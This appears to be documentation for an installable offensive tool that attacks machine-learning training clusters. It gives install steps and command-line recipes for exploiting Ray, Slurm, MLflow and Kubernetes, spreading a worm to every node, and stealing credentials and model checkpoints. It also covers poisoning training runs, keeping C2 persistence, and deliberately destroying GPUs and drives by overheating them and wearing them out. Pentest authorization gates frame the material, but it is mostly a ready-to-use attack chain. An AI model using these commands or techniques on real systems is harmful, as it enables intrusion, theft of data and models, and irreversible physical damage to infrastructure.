SPECTER THUNDERBOLT is the NIGHTFALL framework's ML training cluster exploitation engine. It targets the full training infrastructure stack: Ray distributed compute, Slurm HPC schedulers, MLflow experiment tracking, Kubernetes GPU clusters, and the physical hardware layer. Eight subsystems cover passive cluster fingerprinting, initial access exploitation, cluster worm propagation, credential and data harvest, realtime gradient poisoning, three persistence mechanisms, hardware sabotage, and signed report generation.
The SPREAD subsystem delivers three worm vectors: Ray num_cpus=0 job floods all cluster nodes (CVE-2023-48022 CVSS 9.8), Slurm srun --nodelist=ALL executes across all partitions (CVE-2023-41915 CVSS 8.8), and a Kubernetes privileged DaemonSet deploys to every node. DESTROY gate required for SPREAD, CORRUPT (gradient injection), PERSIST, and SABOTAGE. 3 CVEs. 5 WMD classes. 288 tests.
# Install from PyPI
pip install specter-thunderbolt
# Or install from source
pip install -e /path/to/red-specter-specter-thunderbolt
# Verify
thunderbolt --version
Three gate levels control access to increasingly destructive capabilities. THUNDERBOLT introduces the DESTROY gate — a third tier beyond UNLEASHED requiring three simultaneous conditions.
| Gate | Operations | Requirement |
|---|---|---|
| OPEN | SURVEY (passive fingerprinting, platform detection) | None — passive recon only |
| INJECT | INFILTRATE, HARVEST, CORRUPT (registry), PERSIST (MLflow) | Ed25519-signed scope with ROE |
| DESTROY | SPREAD (worm), CORRUPT (gradient), PERSIST (Ray/Slurm/K8s), SABOTAGE | Signed ROE document + Ed25519 key + --confirm-physical-harm |
thunderbolt infiltrate \
--target 10.0.0.1 \
--gate inject \
--operator "RED SPECTER PENTEST"
# DESTROY gate requires all three conditions
thunderbolt sabotage \
--target 10.0.0.1 \
--gate destroy \
--roe /path/to/signed-roe.json \
--confirm-physical-harm
| CVE | Component | Type | CVSS | Gate |
|---|---|---|---|---|
| CVE-2023-48022 | Ray | Unauthenticated RCE via dashboard API — no auth on default deployments | 9.8 CRITICAL | DESTROY |
| CVE-2024-1483 | MLflow | Path traversal in artifact store — arbitrary file read/write | 9.8 CRITICAL | INJECT |
| CVE-2023-41915 | Slurm | Prolog/epilog filesystem race — privilege escalation to root | 8.8 HIGH | DESTROY |
| Subsystem | Gate | CLI Command | Description |
|---|---|---|---|
| SURVEY | OPEN | thunderbolt survey --target <ip> | Platform fingerprint, CVE applicability, port sweep |
| INFILTRATE | INJECT | thunderbolt infiltrate --target <ip> --cve <id> | Initial access via CVE exploitation |
| SPREAD | DESTROY | thunderbolt spread --target <ip> --vector <ray|slurm|k8s> | Cluster worm propagation to all nodes |
| HARVEST | INJECT | thunderbolt harvest --target <ip> --mode <creds|checkpoints|data> | IAM key theft, checkpoint exfil, data manifest |
| CORRUPT | INJECT/DESTROY | thunderbolt corrupt --target <ip> --mode <registry|gradient> | MLflow registry poison or realtime gradient injection |
| PERSIST | DESTROY | thunderbolt persist --target <ip> --mechanism <ray|slurm|k8s> | C2 polling job, self-resubmit, kube-system CronJob |
| SABOTAGE | DESTROY | thunderbolt sabotage --target <ip> --confirm-physical-harm | GPU power pin, IPMI fan 0%, SSD wear acceleration |
| REPORT | OPEN | thunderbolt report --target <ip> | Ed25519-signed TBT-{hex12} report generation |
The SPREAD subsystem delivers three worm vectors that achieve cluster-wide node compromise from a single entry point. All three require DESTROY gate. The worm payloads are configurable — default payload establishes reverse shell to C2; SABOTAGE mode adds hardware destruction to every worm-reached node.
Ray's dashboard API (default port 8265) accepts unauthenticated job submissions. THUNDERBOLT submits a Ray job with num_cpus=0 — this special resource requirement causes Ray to schedule the job on every available node simultaneously, achieving full cluster propagation in a single API call. The job payload executes on the Ray worker process (often root or a privileged service account) on all cluster nodes.
# Ray worm — propagates to all nodes via num_cpus=0 job submission
# CVE-2023-48022 CVSS 9.8 — no auth required on default Ray deployments
thunderbolt spread --target 10.0.0.1 --vector ray \
--gate destroy --roe /path/to/signed-roe.json
# With SABOTAGE payload on each reached node
thunderbolt spread --target 10.0.0.1 --vector ray \
--gate destroy --roe /path/to/signed-roe.json \
--payload sabotage --confirm-physical-harm
Slurm's prolog/epilog scripts run as root during job setup and teardown. CVE-2023-41915 is a symlink race condition in Slurm's job file handling that allows privilege escalation from a regular cluster user to root. Once root is obtained on the submit node, srun --nodelist=ALL --ntasks=[total_nodes] executes the payload on every node in every partition.
# Slurm privilege escalation + all-node worm
# CVE-2023-41915 CVSS 8.8 — symlink race in prolog/epilog
thunderbolt spread --target 10.0.0.1 --vector slurm \
--gate destroy --roe /path/to/signed-roe.json
On Kubernetes GPU clusters with misconfigured RBAC, THUNDERBOLT deploys a privileged DaemonSet to the kube-system namespace. DaemonSets are scheduled to every node in the cluster by design. The DaemonSet runs with hostPID, hostNetwork, and hostPath mounts, providing full node-level access from the Kubernetes API.
# Kubernetes privileged DaemonSet — every node in the cluster
thunderbolt spread --target 10.0.0.1:6443 --vector k8s \
--gate destroy --roe /path/to/signed-roe.json
All SABOTAGE operations require DESTROY gate, a signed ROE document, and --confirm-physical-harm. These operations cause irreversible hardware damage and cannot be undone once executed.
nvidia-smi -pm 1 enables persistent mode (survives process termination). nvidia-smi -pl [max_tdp] pins the power limit to the GPU's rated maximum TDP: A100 80GB SXM at 400W, H100 SXM5 at 700W, RTX 4090 at 450W. At maximum power with zero airflow (IPMI fan override active), junction temperature rises above safe operating range causing accelerated HBM electromigration and permanent memory cell damage.
Raw IPMI command sequence disables BMC fan control on Dell PowerEdge (iDRAC), HPE ProLiant (iLO), and Supermicro platforms. Requires BMC network access (IPMI LAN, port 623) and credentials — obtained via CVE-2023-41915 root escalation or from harvested configuration files. Zero RPM airflow causes ambient temperature rise of approximately 15-25°C per hour in a properly loaded GPU node.
Sequential write loop targets NVMe training storage (/dev/nvme* or mounted training filesystems). All cluster nodes execute simultaneously via the SPREAD worm. Combined write bandwidth of a 64-node cluster (each with 4x NVMe at ~7 GB/s) reaches ~1.8 TB/s aggregate write — exhausting enterprise NVMe endurance in hours rather than years.
| Mechanism | Platform | Survival | C2 Interval |
|---|---|---|---|
| Ray detached job | Ray | Cluster restart | Every 24 hours |
| Slurm self-resubmit | Slurm | Node reboot via --dependency=afternotok | On job completion/failure |
| K8s CronJob (kube-system) | Kubernetes | Pod eviction, namespace deletion protection | Every 6 hours |
| Class | Trigger | Gate |
|---|---|---|
| training_cluster_annihilation | Worm propagation reached all nodes via Ray/Slurm/K8s | DESTROY |
| realtime_gradient_poison | Adversarial gradients injected during active training run | DESTROY |
| model_ip_exfil | Model checkpoints extracted from MLflow or training filesystem | INJECT |
| training_infrastructure_pwn | Root on Slurm controller or K8s cluster-admin achieved | DESTROY |
| ml_pipeline_backdoor | Poisoned model registered as production in MLflow registry | INJECT |
# OPEN: fingerprint cluster, map attack surface
thunderbolt survey --target 10.0.0.1 --platform auto
# OPEN: scan CIDR range for exposed ML infrastructure
thunderbolt survey --cidr 10.0.0.0/24
# INJECT: MLflow path traversal — initial access
thunderbolt infiltrate --target 10.0.0.1 --cve CVE-2024-1483 --gate inject
# INJECT: harvest IAM credentials + model checkpoints
thunderbolt harvest --target 10.0.0.1 --mode all --gate inject
# INJECT: poison MLflow model registry
thunderbolt corrupt --target 10.0.0.1 --mode registry --gate inject
# DESTROY: Ray cluster worm — all nodes compromised
thunderbolt spread --target 10.0.0.1 --vector ray \
--gate destroy --roe /path/to/signed-roe.json
# DESTROY: realtime gradient injection during active training
thunderbolt corrupt --target 10.0.0.1 --mode gradient \
--gate destroy --roe /path/to/signed-roe.json
# DESTROY: establish Ray C2 persistence (24h poll)
thunderbolt persist --target 10.0.0.1 --mechanism ray \
--gate destroy --roe /path/to/signed-roe.json
# DESTROY: hardware sabotage — GPU pin + IPMI fan + SSD wear
thunderbolt sabotage --target 10.0.0.1 \
--gate destroy --roe /path/to/signed-roe.json \
--confirm-physical-harm
# Full annihilate (auto kill chain — DESTROY gate)
thunderbolt annihilate --target 10.0.0.1 \
--gate destroy --roe /path/to/signed-roe.json \
--confirm-physical-harm \
--output /tmp/specter-thunderbolt-results/
All reports are signed with the operator's Ed25519 key. Report IDs use the format TBT-{hex12} (12 random hex bytes). Reports include:
| Field | Value |
|---|---|
| report_id | TBT-{hex12} Ed25519-signed |
| risk_score | 0.0–1.0 (floors 0.95 on DESTROY-gated WMD class confirmed) |
| wmd_classes | List of triggered WMD class IDs |
| cves_confirmed | Confirmed CVEs with CVSS scores |
| hardware_damage_assessment | GPU thermal damage probability, NVMe endurance depletion estimate, estimated replacement cost USD |
| mitre_atlas | AML.T0018 / AML.T0043 / AML.T0048 / AML.T0054 |
| owasp | LLM03 / LLM06 |
| financial_blast_radius | Training compute cost USD, model IP value estimate, hardware replacement cost |
| roe_hash | SHA-256 of signed ROE document (DESTROY operations only) |
| output_formats | JSON + Markdown |